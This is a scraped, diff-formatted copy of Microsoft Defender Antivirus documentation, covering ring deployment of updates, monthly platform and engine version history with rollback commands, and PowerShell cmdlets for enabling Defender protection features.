-> For more information on how to control daily security intelligence updates, see [Schedule Microsoft Defender Antivirus protection updates](manage-protection-update-schedule-microsoft-defender-antivirus.md). Updates ensure that next-generation protection can defend against new threats, even if cloud-delivered protection is not available to the endpoint.
-
-This article provides overview information about deploying Microsoft Defender Antivirus in rings for a gradual rollout process.
-
-## Management tools
-
-To create your own custom gradual rollout process for daily and/or monthly updates, you can use the following methods that use the tools:
--- **Microsoft Intune and Microsoft Update** microsoft-intune-and-microsoft-update - Requires direct access to the internet. Microsoft Update (MU), formerly known as Windows Update (WU)-- **System Center Configuration Manager and Windows Server Update Services** - System Center Configuration Manager (SCCM) Software Update Point (SUP) = SCCM + Windows Server Update Services (WSUS)-- **Group Policy and Microsoft Update** - Requires direct access to the internet-- **Group Policy and network share** - For example, UNC path, SMB, CIFS-- **Group Policy and WSUS**-
-For details on how to use these tools, see [Create a custom gradual rollout process for Microsoft Defender updates](configure-updates.md).
-
-Customers that prioritize availability over security, should take a crawl, walk, run approach.
-
-## Deployment scenarios
--- [Ring deployment using Intune and Microsoft Update](microsoft-defender-antivirus-ring-deployment-intune-microsoft-update.md)-- [Ring deployment using System Center Configuration Manager and Windows Server Update Services (WSUS)](microsoft-defender-antivirus-ring-deployment-sscm-wsus.md)-- [Ring deployment using Group Policy and Microsoft Update](microsoft-defender-antivirus-ring-deployment-group-policy-microsoft-update.md)-- [Ring deployment using Group Policy and network share](microsoft-defender-antivirus-ring-deployment-group-policy-network-share.md)-- Ring deployment using Group Policy and Windows Server Update Services
- - [Pilot ring deployment using Group Policy and Windows Server Update Services](microsoft-defender-antivirus-pilot-ring-deployment-group-policy-wsus.md)
- - [Production ring deployment using Group Policy and Windows Server Update Services](microsoft-defender-antivirus-production-ring-deployment-group-policy-wsus.md)
security Microsoft Defender Antivirus Updates https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/microsoft-defender-antivirus-updates.md
- Title: Microsoft Defender Antivirus security intelligence and product updates
-description: Manage how Microsoft Defender Antivirus receives protection and product updates.
- Previously updated : 04/09/2024---------- m365-security-- tier2-- mde-ngp--
-# Microsoft Defender Antivirus security intelligence and product updates
-
-**Applies to:**
--- [Microsoft Defender for Endpoint Plans 1 and 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- Microsoft Defender Antivirus-
-**Platforms**
--- Windows-
-Keeping Microsoft Defender Antivirus up to date is critical to assure your devices have the latest technology and features needed to protect against new malware and attack techniques. Update your antivirus protection, even if Microsoft Defender Antivirus is running in [passive mode](microsoft-defender-antivirus-compatibility.md). This article includes information about the two types of updates for keeping Microsoft Defender Antivirus current:
--- [Security intelligence updates](#security-intelligence-updates)-- [Product updates](#product-updates)-
-This article also includes:
--- [Microsoft Defender Antivirus platform support](#microsoft-defender-antivirus-platform-support)-- [How to roll back an update](#how-to-roll-back-an-update) (if necessary)-- [Platform version included with Windows 10 releases](#platform-version-included-with-windows-10-releases)-- [Updates for Deployment Image Servicing and Management (DISM)](#updates-for-deployment-image-servicing-and-management-dism)-
-> [!TIP]
-> To see the most current engine, platform, and signature date, visit the [Security intelligence updates for Microsoft Defender Antivirus and other Microsoft antimalware](https://www.microsoft.com/en-us/wdsi/defenderupdates)
-
-## Security intelligence updates
-
-Microsoft Defender Antivirus uses [cloud-delivered protection](cloud-protection-microsoft-defender-antivirus.md) (also called the *Microsoft Advanced Protection Service*, or MAPS) and periodically downloads dynamic security intelligence updates to provide more protection. These dynamic updates don't take the place of regular security intelligence updates via security intelligence update KB2267602.
-
-> [!NOTE]
-> Updates are released under the following KBs:
->
-> - Microsoft Defender Antivirus: KB2267602
-> - System Center Endpoint Protection: KB2461484
-
-Cloud-delivered protection is always on and requires an active connection to the Internet to function. Security intelligence updates occur on a scheduled cadence (configurable via policy). For more information, see [Use Microsoft cloud-provided protection in Microsoft Defender Antivirus](cloud-protection-microsoft-defender-antivirus.md).
-
-For a list of recent security intelligence updates, see [Security intelligence updates for Microsoft Defender Antivirus and other Microsoft antimalware](https://www.microsoft.com/en-us/wdsi/defenderupdates).
-
-Engine updates are included with security intelligence updates and are released on a monthly cadence.
-
-## Product updates
-
-Microsoft Defender Antivirus requires monthly updates (KB4052623) known as *platform updates*.
-
-You can manage the distribution of updates through one of the following methods:
--- [Windows Server Update Service (WSUS)](/mem/configmgr/protect/deploy-use/endpoint-definitions-wsus#to-synchronize-endpoint-protection-definition-updates-in-standalone-wsus)-- [Microsoft Configuration Manager](/configmgr/sum/understand/software-updates-introduction)-- The usual methods you use to deploy Microsoft and Windows updates to endpoints in your network.-
-For more information, see [Manage the sources for Microsoft Defender Antivirus protection updates](/mem/configmgr/protect/deploy-use/endpoint-definitions-wsus#to-synchronize-endpoint-protection-definition-updates-in-standalone-wsus).
-
-### Important points about product updates
--- Monthly updates are released in phases, resulting in multiple packages visible in your [Window Server Update Services](/windows-server/administration/windows-server-update-services/get-started/windows-server-update-services-wsus).--- This article lists changes that are included in the broad release channel. [See the latest broad channel release here](https://www.microsoft.com/security/encyclopedia/adlpackages.aspx?action=info).--- To learn more about the gradual rollout process, and to see more information about the next release, see [Manage the gradual rollout process for Microsoft Defender updates](manage-gradual-rollout.md).--- To learn more about security intelligence updates, see [Security intelligence updates for Microsoft Defender Antivirus and other Microsoft antimalware](https://www.microsoft.com/en-us/wdsi/defenderupdates).--- If you're looking for a list of Microsoft Defender processes, **[download the mde-urls workbook](https://download.microsoft.com/download/6/b/f/6bfff670-47c3-4e45-b01b-64a2610eaefa/mde-urls-commercial.xlsx
-)**, and then select the **Microsoft Defender Processes** worksheet. The `mde-urls` workbook also lists the services and their associated URLs that your network must be able to connect to, as described in [Enable access to Microsoft Defender for Endpoint service URLs in the proxy server](configure-proxy-internet.md).
--- Platform updates can be temporarily postponed if other protection features (such as [Endpoint DLP](../../compliance/endpoint-dlp-getting-started.md) or [Device Control](device-control-report.md)) are actively monitoring running processes. Platform updates are retried after a reboot or when all monitored services are stopped.--- In the **Microsoft Endpoint Configuration Manager / Windows Server Update Services** (MECM/WSUS) catalog, the _category_ **Microsoft Defender for Endpoint** includes updates for the MSSense service in [KB5005292](https://www.catalog.update.microsoft.com/Search.aspx?q=KB5005292). KB5005292 includes updates and fixes to the Microsoft Defender for Endpoint **endpoint detection and response** (EDR) sensor. For more information, see [Microsoft Defender for Endpoint update for EDR Sensor](https://support.microsoft.com/topic/microsoft-defender-for-endpoint-update-for-edr-sensor-f8f69773-f17f-420f-91f4-a8e5167284ac) and [What's new in Microsoft Defender for Endpoint on Windows](windows-whatsnew.md).-
-## Monthly platform and engine versions
-
-All our updates contain
--- Performance improvements-- Serviceability improvements-- Integration improvements (Cloud, [Microsoft Defender XDR](/microsoft-365/security/defender/microsoft-365-defender))-
-### March-2024 (Engine: 1.1.24030.4 | Platform: 4.18.24030.9)
--- Security intelligence update version: **1.409.1.0**-- Release date: **April 2, 2024** (Engine) / **April 9, 2024** (Platform)-- Engine: **1.1.24030.4**-- Platform: **4.18.24030.9**-- Support phase: **Security and Critical Updates**-
-#### What's new
--- Added manageability settings to opt-out for One Collector telemetry channel and Experimentation and Configuration Service (ECS).-- Microsoft Defender Core Service will be disabled when 3rd party Antivirus is installed (except when Defender for Endpoint is running in Passive mode).-- The known issue in [4.18.24020.7](#february-2024-engine-11240209--platform-418240207) where enforcement of device level access policies wasn't working as expected no longer occurs.-- Fixed high CPU issue caused by redetection done during Sense originating scans.-- Fixed an issue with Security Intelligence Update disk cleanup.-- Fixed an issue where the Signature date information on the Security Health report wasn't accurate.-- Introducted performance improvements when processing paths for exclusions.-- Added improvements to allow recovering from erroneously added [Indicators of compromise (IoC)](manage-indicators.md).-- Improved resilience in processing [attack surface reduction](attack-surface-reduction.md) exclusions for Anti Malware Scan Interface (AMSI) scans.-- Fixed a high memory issue related to the [Behavior Monitoring](behavior-monitor.md) queue that occurred when MAPS is disabled.-- A possible deadlock when receiving a [Tamper protection](prevent-changes-to-security-settings-with-tamper-protection.md) configuration change from the [Microsoft Defender portal](https://security.microsoft.com) no longer occurs.-
-### February-2024 (Engine: 1.1.24020.9 | Platform: 4.18.24020.7)
--- Security intelligence update version: **1.407.46.0**-- Release date: **March 6, 2024** (Engine) / **March 12, 2024** (Platform)-- Engine: **1.1.24020.9**-- Platform: **4.18.24020.7**-- Support phase: **Security and Critical Updates**-
-#### What's new
--- Improved support for virtualizing while compressing or decompressing zip files-- Improved reporting in the Microsoft Defender portal ([https://security.microsoft.com](https://security.microsoft.com)) for block-only remediations-- Reduced the number of false positives for [attack surface reduction rules](/microsoft-365/security/defender-endpoint/attack-surface-reduction) for known trusted processes-- Improved [Get-MpPreference](/powershell/module/defender/get-mppreference) logic for proxy bypass settings-- Extended the toast notification support for [Indicators of Compromise](/microsoft-365/security/defender-endpoint/manage-indicators#indicator-of-compromise-ioc-overview) (IoC) detections-
-#### Known issues
--- For [device control](device-control-overview.md) customers using removable media policies with disk/device-level access only (masks that include the values 1, 2, 3, 4, and 7), enforcement might not work as expected. In such situations, we recommend customers roll back to the previous version of the Defender platform.-
-### January-2024 (Platform: 4.18.24010.12 | Engine: 1.1.24010.10)
--- Security intelligence update version: **1.405.702.0**-- Release date: **February 27, 2024**-- Platform: **4.18.24010.12**-- Engine: **1.1.24010.10**-- Support phase: **Security and Critical Updates**-
-#### What's new
--- Microsoft Defender Antivirus now caches the Mark of the Web (MoTW) Alternative Data Stream (ADS) for better performance while scanning.-- Fixed an issue that occurred in [attack surface reduction](attack-surface-reduction-rules-reference.md) in warn mode when removing scan results from the real-time protection cache.-- Performance improvement added for `OneNote.exe`.-- Cloud-based entries are regularly removed from the persistent user mode cache in Windows Defender to prevent an uncommon issue where a user could still add a certificate, based on an Indicator of compromise (IoC), to the cache after a file with that certificate had already been added via cloud signature.-- The Sense onboarding event is now sent in passive mode for operating systems with the old Sense client.-- Improved performance for logs created/accessed by powershell.-- Improved performance for folders included in [Controlled folder access(CFA)](controlled-folders.md) when accessing network files.-- Fixed a deadlock that occurred at shutdown for Data Loss Prevention (DLP) enabled devices.-- Fixed an issue to remove a vulnerability in the Microsoft Defender Core service.-- Fixed an onboarding issue in the Unified Agent installation script [install.ps1](https://github.com/microsoft/mdefordownlevelserver).-- Fixed a memory leak that impacted some devices that received platform update `4.18.24010.7`-
-### Previous version updates: Technical upgrade support only
-
-After a new package version is released, support for the previous two versions is reduced to technical support only. For more information about previous versions, see [Microsoft Defender Antivirus updates: Previous versions for technical upgrade support](msda-updates-previous-versions-technical-upgrade-support.md).
-
-## Microsoft Defender Antivirus platform support
-
-Platform and engine updates are provided on a monthly cadence. To be fully supported, keep current with the latest platform updates. Our support structure is dynamic, evolving into two phases depending on the availability of the latest platform version:
--- **Security and Critical Updates servicing phase** - When running the latest platform version, you're eligible to receive both Security and Critical updates to the anti-malware platform.--- **Technical Support (Only) phase** - After a new platform version is released, support for older versions (N-2) reduce to [technical support only](msda-updates-previous-versions-technical-upgrade-support.md). Platform versions older than N-2 are no longer supported. Technical support continues to be provided for upgrades from the Windows 10 release version (see [Platform version included with Windows 10 releases](#platform-version-included-with-windows-10-releases)) to the latest platform version.-
-During the technical support (only) phase, commercially reasonable support incidents are provided through Microsoft Customer Service & Support and Microsoft's managed support offerings (such as Premier Support). If a support incident requires escalation to development for further guidance, requires a nonsecurity update, or requires a security update, customers are asked to upgrade to the latest platform version or an intermediate update (*).
-
-> [!NOTE]
-> If you are manually deploying Microsoft Defender Antivirus Platform Update, or if you are using a script or a non-Microsoft management product to deploy Microsoft Defender Antivirus Platform Update, make sure that version `4.18.2001.10` is installed from the [Microsoft Update Catalog](https://www.catalog.update.microsoft.com/Search.aspx?q=4.18.2001.10) before the latest version of Platform Update (N-2) is installed.
-
-## How to roll back an update
-
-In the unfortunate event that you encounter issues after a platform update, you can roll back to the previous or the inbox version of the Microsoft Defender platform.
--- To roll back to the previous version, run the following command:-
- `"%programdata%\Microsoft\Windows Defender\Platform\<version>\MpCmdRun.exe" -RevertPlatform`
--- To roll back this update to the version shipped with the Operating System ("%ProgramFiles%\Windows Defender")-
- `"%programdata%\Microsoft\Windows Defender\Platform\<version>\MpCmdRun.exe" -ResetPlatform`
-
-## Platform version included with Windows 10 releases
-
-The below table provides the Microsoft Defender Antivirus platform and engine versions that are shipped with the latest Windows 10 releases:
-
-|Windows 10 release |Platform version |Engine version |Support phase |
-|:|:|:|:|
-|2004 (20H1/20H2) | `4.18.1909.6` | `1.1.17000.2` | Technical upgrade support (only) |
-|1909 (19H2) |`4.18.1902.5` |`1.1.16700.3` | Technical upgrade support (only) |
-|1903 (19H1) |`4.18.1902.5` |`1.1.15600.4` | Technical upgrade support (only) |
-|1809 (RS5) |`4.18.1807.5` |`1.1.15000.2` | Technical upgrade support (only) |
-|1803 (RS4) |`4.13.17134.1` |`1.1.14600.4` | Technical upgrade support (only) |
-|1709 (RS3) |`4.12.16299.15` |`1.1.14104.0` | Technical upgrade support (only) |
-|1703 (RS2) |`4.11.15603.2` |`1.1.13504.0` | Technical upgrade support (only) |
-|1607 (RS1) |`4.10.14393.3683` |`1.1.12805.0` | Technical upgrade support (only) |
-
-For Windows 10 release information, see the [Windows lifecycle fact sheet](https://support.microsoft.com/help/13853/windows-lifecycle-fact-sheet).
-
-> [!NOTE]
-> Windows Server 2016 ships with the same Platform version as RS1 and falls under the same support phase: Technical upgrade support (only)
-> Windows Server 2019 ships with the same Platform version as RS5 and falls under the same support phase: Technical upgrade support (only)
-
-## Updates for Deployment Image Servicing and Management (DISM)
-
-To avoid a gap in protection, keep your OS installation images up to date with the latest antivirus and antimalware updates. Updates are available for:
--- Windows 10 and 11 (Enterprise, Pro, and Home editions)-- Windows Server 2022, Windows Server 2019, Windows Server 2016, and Windows Server 2012 R2-- WIM and VHD(x) files -
-Updates are released for x86, x64, and ARM64 Windows architecture.
-
-For more information, see [Microsoft Defender update for Windows operating system installation images](https://support.microsoft.com/help/4568292/defender-update-for-windows-operating-system-installation-images).
-
-### 20230809.1
--- Defender package version: **20230809.1**-- Security intelligence version: **1.395.68.0**-- Engine version: **1.1.23070.1005**-- Platform version: **4.18.23070.1004**-
-#### Fixes
--- None-
-### 20230604.1
--- Defender package version: **20230604.1**-- Security intelligence version: **1.391.476.0**-- Engine version: **1.1.23050.3**-- Platform version: **4.18.23050.3**-
-#### Fixes
--- None-
-### 20230503.1
--- Defender package version: **20230503.1**-- Security intelligence version: **1.389.44.0**-- Engine version: **1.1.20300.3**-- Platform version: **4.18.2304.8**-
-#### Fixes
--- None-
-#### Additional information
--- None-
-### 20230330.2
--- Defender package version: **20230330.2**-- Security intelligence version: **1.385.1537.0**-- Engine version: **1.1.20100.6**-- Platform version: **4.18.2302.7**-
-#### Fixes
--- None-
-#### Additional information
--- None-
-### 20230308.1
--- Defender package version: **20230308.1**-- Security intelligence version: **1.383.1321.0**-- Engine version: **1.1.20000.2**-- Platform version: **4.18.2301.6**-
-#### Fixes
--- None-
-#### Additional information
--- None-
-### 20230215.1
--- Defender package version: **20230215.1**-- Security intelligence version: **1.383.51.0**-- Engine version: **1.1.20000.2**-- Platform version: **4.18.2301.6**-
-#### Fixes
--- None-
-#### Additional information
--- None-
-### 20230118.1
--- Defender package version: **20230118.1**-- Security intelligence version: **1.381.2404.0**-- Engine version: **1.1.19900.2**-- Platform version: **4.18.2211.5**-
-#### Fixes
--- None-
-#### Additional information
--- None-
-### 20221209.1
--- Defender package version: **20221209.1**-- Security intelligence version: **1.381.144.0**-- Engine version: **1.1.19900.2**-- Platform version: **4.18.2211.5**-
-#### Fixes
--- None-
-#### Additional information
--- None-
-### 20221102.3
--- Defender package version: **20221102.3**-- Security intelligence version: **1.377.1180.0**-- Engine version: **1.1.19700.3**-- Platform version: **4.18.2210.4**-
-#### Fixes
--- None-
-#### Additional information
--- None-
-### 20221014.1
--- Package version: **20221014.1**-- Platform version: **4.18.2209.7**-- Engine version: **1.1.19700.3**-- Signature version: **1.373.208.0**-
-#### Fixes
--- None-
-#### Additional information
--- None-
-### 20220929.1
--- Package version: **20220929.1**-- Platform version: **4.18.2207.7**-- Engine version: **1.1.19600.3**-- Signature version: **1.373.1243.0**-
-#### Fixes
--- None-
-#### Additional information
--- None-
-### 20220925.2
--- Package version: **20220925.2**-- Platform version: **4.18.2207.7**-- Engine version: **1.1.19600.3**-- Signature version: **1.373.1371.0**-
-#### Fixes
--- None-
-#### Additional information
--- None-
-### 20220901.4
--- Package version: **20220901.4**-- Platform version: **4.18.2205.7**-- Engine version: **1.1.19500.2**-- Signature version: **1.373.1371.0**-
-#### Fixes
--- None-
-#### Additional information
--- None-
-### 20220802.1
--- Package version: **20220802.1**-- Platform version: **4.18.2205.7**-- Engine version: **1.1.19400.3**-- Signature version: **1.371.1205.0**-
-#### Fixes
--- None-
-#### Additional information
--- None-
-### 20220629.5
--- Package version: **20220629.5**-- Platform version: **4.18.2205.7**-- Engine version: **1.1.19300.2**-- Signature version: **1.369.220.0**-
-#### Fixes
--- None-
-#### Additional information
--- None-
-### 20220603.3
--- Package version: **20220603.3**-- Platform version: **4.18.2203.5**-- Engine version: **1.1.19200.6**-- Signature version: **1.367.1009.0**-
-#### Fixes
--- None-
-#### Additional information
--- None-
-### 20220506.6
--- Package version: **20220506.6**-- Platform version: **4.18.2203.5**-- Engine version: **1.1.19200.5**-- Signature version: **1.363.1436.0**-
-#### Fixes
--- None-
-#### Additional information
--- None-
-### 20220321.1
--- Package version: **20220321.1**-- Platform version: **4.18.2202.4**-- Engine version: **1.1.19000.8**-- Signature version: **1.351.337.0**-
-#### Fixes
--- None-
-#### Additional information
--- None-
-### 20220305.1
--- Package version: **20220305.1**-- Platform version: **4.18.2201.10**-- Engine version: **1.1.18900.3**-- Signature version: **1.359.1405.0**-
-#### Fixes
--- None-
-#### Additional information
--- None-
-### 20220203.1
--- Package version: **20220203.1**-- Platform version: **4.18.2111.5**-- Engine version: **1.1.18900.2**-- Signature version: **1.357.32.0**-
-#### Fixes
--- None-
-#### Additional information
--- None-
-### 20220105.1
--- Package version: **20220105.1**-- Platform version: **4.18.2111.5**-- Engine version: **1.1.18800.4**-- Signature version: **1.355.1482.0**-
-#### Fixes
--- None-
-#### Additional information
--- None--
-### 1.1.2112.01
--- Package version: **1.1.2112.01**-- Platform version: **4.18.2110.6**-- Engine version: **1.1.18700.4**-- Signature version: **1.353.2283.0**-
-#### Fixes
--- None-
-#### Additional information
--- None-
-### 1.1.2111.02
--- Package version: **1.1.2111.02**-- Platform version: **4.18.2110.6**-- Engine version: **1.1.18700.4**-- Signature version: **1.353.613.0**-
-#### Fixes
--- Fixed an issue pertaining to localization files-
-#### Additional information
--- None-
-### 1.1.2110.01
--- Package version: **1.1.2110.01**-- Platform version: **4.18.2109.6**-- Engine version: **1.1.18500.10**-- Signature version: **1.349.2103.0**-
-#### Fixes
--- None-
-#### Additional information
--- None-
-### 1.1.2109.01
--- Package version: **1.1.2109.01**-- Platform version: **4.18.2107.4**-- Engine version: **1.1.18400.5**-- Signature version: **1.347.891.0**-
-#### Fixes
--- None-
-#### Additional information
--- None-
-### 1.1.2108.01
--- Package version: **1.1.2108.01**-- Platform version: **4.18.2107.4**-- Engine version: **1.1.18300.4**-- Signature version: **1.343.2244.0**-
-#### Fixes
--- None-
-#### Additional information
--- None-
-### 1.1.2107.02
--- Package version: **1.1.2107.02**-- Platform version: **4.18.2105.5**-- Engine version: **1.1.18300.4**-- Signature version: **1.343.658.0**-
-#### Fixes
--- None-
-#### Additional information
--- None-
-### 1.1.2106.01
--- Package version: **1.1.2106.01**-- Platform version: **4.18.2104.14**-- Engine version: **1.1.18100.6**-- Signature version: **1.339.1923.0**-
-#### Fixes
--- None-
-#### Additional information
--- None-
-### 1.1.2105.01
--- Package version: **1.1.2105.01**-- Platform version: **4.18.2103.7**-- Engine version: **1.1.18100.6**-- Signature version: **1.339.42.0**-
-#### Fixes
--- None-
-#### Additional information
--- None--
-### 1.1.2104.01
--- Package version: **1.1.2104.01**-- Platform version: **4.18.2102.4**-- Engine version: **1.1.18000.5**-- Signature version: **1.335.232.0**-
-#### Fixes
--- None-
-#### Additional information
--- None-
-### 1.1.2103.01
--- Package version: **1.1.2103.01**-- Platform version: **4.18.2101.9**-- Engine version: **1.1.17800.5**-- Signature version: **1.331.2302.0**-
-#### Fixes
--- None-
-#### Additional information
--- None-
-### 1.1.2102.03
--- Package version: **1.1.2102.03**-- Platform version: **4.18.2011.6**-- Engine version: **1.1.17800.5**-- Signature version: **1.331.174.0**-
-#### Fixes
--- None-
-#### Additional information
--- None-
-### 1.1.2101.02
--- Package version: **1.1.2101.02**-- Platform version: **4.18.2011.6**-- Engine version: **1.1.17700.4**-- Signature version: **1.329.1796.0**-
-#### Fixes
--- None-
-#### Additional information
--- None-
-### 1.1.2012.01
--- Package version: **1.1.2012.01**-- Platform version: **4.18.2010.7**-- Engine version: **1.1.17600.5**-- Signature version: **1.327.1991.0**-
-#### Fixes
--- None-
-#### Additional information
--- None-
-### 1.1.2011.02
--- Package version: **1.1.2011.02**-- Platform version: **4.18.2010.7**-- Engine version: **1.1.17600.5**-- Signature version: **1.327.658.0**-
-#### Fixes
--- None-
-#### Additional information
--- Refreshed Microsoft Defender Antivirus signatures-
-### 1.1.2011.01
--- Package version: **1.1.2011.01**-- Platform version: **4.18.2009.7**-- Engine version: **1.1.17600.5**-- Signature version: **1.327.344.0**-
-#### Fixes
--- None-
-#### Additional information
--- None-
-### 1.1.2009.10
--- Package version: **1.1.2011.01**-- Platform version: **4.18.2008.9**-- Engine version: **1.1.17400.5**-- Signature version: **1.327.2216.0**-
-#### Fixes
--- None-
-#### Additional information
--- Added support for Windows 10 RS1 or later OS install images.-
-## More resources
-
-| Article | Description |
-|:|:|
-|[Microsoft Defender update for Windows operating system installation images](https://support.microsoft.com/help/4568292/defender-update-for-windows-operating-system-installation-images) | Review antimalware update packages for your OS installation images (WIM and VHD files). Get Microsoft Defender Antivirus updates for Windows 10 (Enterprise, Pro, and Home editions), Windows Server 2019, Windows Server 2022, Windows Server 2016, and Windows Server 2012 R2 installation images. |
-|[Manage how protection updates are downloaded and applied](manage-protection-updates-microsoft-defender-antivirus.md) | Protection updates can be delivered through many sources. |
-|[Manage when protection updates should be downloaded and applied](manage-protection-update-schedule-microsoft-defender-antivirus.md) | You can schedule when protection updates should be downloaded. |
-|[Manage updates for endpoints that are out of date](manage-outdated-endpoints-microsoft-defender-antivirus.md) | If an endpoint misses an update or scheduled scan, you can force an update or scan the next time a user signs in. |
-|[Manage event-based forced updates](manage-event-based-updates-microsoft-defender-antivirus.md) | You can set protection updates to be downloaded at startup or after certain cloud-delivered protection events. |
-|[Manage updates for mobile devices and virtual machines (VMs)](manage-updates-mobile-devices-vms-microsoft-defender-antivirus.md)| You can specify settings, such as whether updates should occur on battery power that 's especially useful for mobile devices and virtual machines. |
-| [Microsoft Defender for Endpoint update for EDR Sensor](https://support.microsoft.com/topic/microsoft-defender-for-endpoint-update-for-edr-sensor-f8f69773-f17f-420f-91f4-a8e5167284ac) | You can update the EDR sensor (MsSense.exe) that's included in the new Microsoft Defender for Endpoint unified solution package released in 2021. |
-
-> [!TIP]
-> If you're looking for Antivirus related information for other platforms, see:
-> - [Set preferences for Microsoft Defender for Endpoint on macOS](mac-preferences.md)
-> - [Microsoft Defender for Endpoint on Mac](microsoft-defender-endpoint-mac.md)
-> - [macOS Antivirus policy settings for Microsoft Defender Antivirus for Intune](/mem/intune/protect/antivirus-microsoft-defender-settings-macos)
-> - [Set preferences for Microsoft Defender for Endpoint on Linux](linux-preferences.md)
-> - [Microsoft Defender for Endpoint on Linux](microsoft-defender-endpoint-linux.md)
-> - [Configure Defender for Endpoint on Android features](android-configure.md)
-> - [Configure Microsoft Defender for Endpoint on iOS features](ios-configure-features.md)
--
security Microsoft Defender Antivirus Using Powershell https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/microsoft-defender-antivirus-using-powershell.md
- Title: Evaluate Microsoft Defender Antivirus using PowerShell.
-description: Businesses of all sizes can use this guide to evaluate and test the protection offered by Microsoft Defender Antivirus in Windows using PowerShell.
----- Previously updated : 10/18/2018------ m365-security-- tier2-- mde-ngp--
-# Evaluate Microsoft Defender Antivirus using Powershell
--
-**Applies to:**
--- Microsoft Defender Antivirus-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)-
-In Windows 10 or newer and Windows Server 2016 or newer you can use next-generation protection features offered by Microsoft Defender Antivirus(MDAV) and Microsoft Defender Exploit Guard (Microsoft Defender EG).
-
-This topic explains how to enable and test the key protection features in Microsoft Defender AV and Microsoft Defender EG, and provides you with guidance and links to more information.
-
-We recommend you use [this evaluation PowerShell script](https://aka.ms/wdeppscript) to configure these features, but you can individually enable each feature with the cmdlets described in the rest of this document.
-
-See the following product documentation libraries for more information about our EPP products:
--- [Microsoft Defender Antivirus](https://aka.ms/wdavdocs)-- [Microsoft Defender Exploit Guard](https://aka.ms/wdegdocs)-
-This article describes configuration options in Windows 10 or newer and Windows Server 2016 or newer.
-
-If you have any questions about a detection that Microsoft Defender AV makes, or you discover a missed detection, you can submit a file to us at [our sample submission help site.](https://www.microsoft.com/security/portal/mmpc/help/submission-help.aspx)
-
-## Use PowerShell to enable the features
-
-This guide provides the [Microsoft Defender Antivirus cmdlets](/powershell/module/defender/?view=windowsserver2022-ps) that configure the features you should use to evaluate our protection.
-
-To use these cmdlets:
-
-> 1\. Open an elevated instance of PowerShell (choose to Run as administrator).
->
-> 2\. Enter the command listed in this guide and press Enter.
-
-You can check the status of all settings before you begin, or during your evaluation, by using the [Get-MpPreference PowerShell cmdlet](/powershell/module/defender/get-mppreference?view=windowsserver2022-ps).
-
-Microsoft Defender AV indicates a detection through [standard Windows notifications](configure-notifications-microsoft-defender-antivirus.md). You can also [review detections in the Microsoft Defender AV app](review-scan-results-microsoft-defender-antivirus.md).
-
-The Windows event log also records detection and engine events. [See the Microsoft Defender Antivirus events article for a list of event IDs](troubleshoot-microsoft-defender-antivirus.yml) and their corresponding actions.
-
-## Cloud protection features
-
-Standard definition updates can take hours to prepare and deliver; our cloud-delivered protection service can deliver this protection in seconds.
-
-More details are available in [Use next-gen technologies in Microsoft Defender Antivirus through cloud-delivered protection](/windows/threat-protection/windows-defender-antivirus/utilize-microsoft-cloud-protection-windows-defender-antivirus).
-
-| Description | PowerShell Command |
-|||
-|Enable the Microsoft Defender Cloud for near-instant protection and increased protection|Set-MpPreference -MAPSReporting Advanced|
-|Automatically submit samples to increase group protection|Set-MpPreference -SubmitSamplesConsent Always|
-|Always Use the cloud to block new malware within seconds|Set-MpPreference -DisableBlockAtFirstSeen 0|
-|Scan all downloaded files and attachments|Set-MpPreference -DisableIOAVProtection 0|
-|Set cloud block level to 'High'|Set-MpPreference -CloudBlockLevel High|
-|High Set cloud block timeout to 1 minute|Set-MpPreference -CloudExtendedTimeout 50|
-
-## Always-on protection (real-time scanning)
-
-Microsoft Defender AV scans files as soon as they're seen by Windows, and will monitor running processes for known or suspected malicious behaviors. If the antivirus engine discovers malicious modification, it will immediately block the process or file from running.
-
-See [Configure behavioral, heuristic, and real-time protection](configure-protection-features-microsoft-defender-antivirus.md) for more details on these options.
-
-| Description | PowerShell Command |
-|||
-|Constantly monitor files and processes for known malware modifications | Set-MpPreference -DisableRealtimeMonitoring 0 |
-|Constantly monitor for known malware behaviors ΓÇô even in ΓÇÿcleanΓÇÖ files and running programs | Set-MpPreference -DisableBehaviorMonitoring 0 |
-|Scan scripts as soon as they are seen or run | Set-MpPreference -DisableScriptScanning 0 |
-|Scan removable drives as soon as they are inserted or mounted | Set-MpPreference -DisableRemovableDriveScanning 0 |
-
-## Potentially Unwanted Application protection
-
-[Potentially unwanted applications](detect-block-potentially-unwanted-apps-microsoft-defender-antivirus.md) are files and apps that are not traditionally classified as malicious. These include third-party installers for common software, ad-injection, and certain types of toolbars in your browser.
-
-| Description | PowerShell Command |
-|||
-|Prevent grayware, adware, and other potentially unwanted apps from installing|Set-MpPreference -PUAProtection Enabled|
-
-## Email and archive scanning
-
-You can set Microsoft Defender Antivirus to automatically scan certain types of email files and archive files (such as .zip files) when they are seen by Windows. More information about this feature can be found under the [Manage email scans in Microsoft Defender](configure-advanced-scan-types-microsoft-defender-antivirus.md) article.
--
-| Description | PowerShell Command |
-|||
-|Scan email files and archives|Set-MpPreference -DisableArchiveScanning 0 </br> Set-MpPreference -DisableEmailScanning 0|
-
-## Manage product and protection updates
-
-Typically, you receive Microsoft Defender AV updates from Windows update once per day. However, you can increase the frequency of those updates by setting the following options, and [ensuring that your updates are managed either in System Center Configuration Manager, with Group Policy, or in Intune](deploy-manage-report-microsoft-defender-antivirus.md).
-
-| Description | PowerShell Command |
-|||
-|Update signatures every day|Set-MpPreference -SignatureUpdateInterval|
-|Check to update signatures before running a scheduled scan|Set-MpPreference -CheckForSignaturesBeforeRunningScan 1|
-
-## Advanced threat and exploit mitigation and prevention Controlled folder access
-
-Microsoft Defender Exploit Guard provides features that help protect devices from known malicious behaviors and attacks on vulnerable technologies.
-
-| Description | PowerShell Command |
-|||
-|Prevent malicious and suspicious apps (such as ransomware) from making changes to protected folders with Controlled folder access|Set-MpPreference -EnableControlledFolderAccess Enabled|
-|Block connections to known bad IP addresses and other network connections with [Network protection](network-protection.md)|Set-MpPreference -EnableNetworkProtection Enabled|
-|Apply a standard set of mitigations with [Exploit protection](exploit-protection.md)|Invoke-WebRequest </br> https://demo.wd.microsoft.com/Content/ProcessMitigation.xml -OutFile ProcessMitigation.xml </br >Set-ProcessMitigation -PolicyFilePath ProcessMitigation.xml|
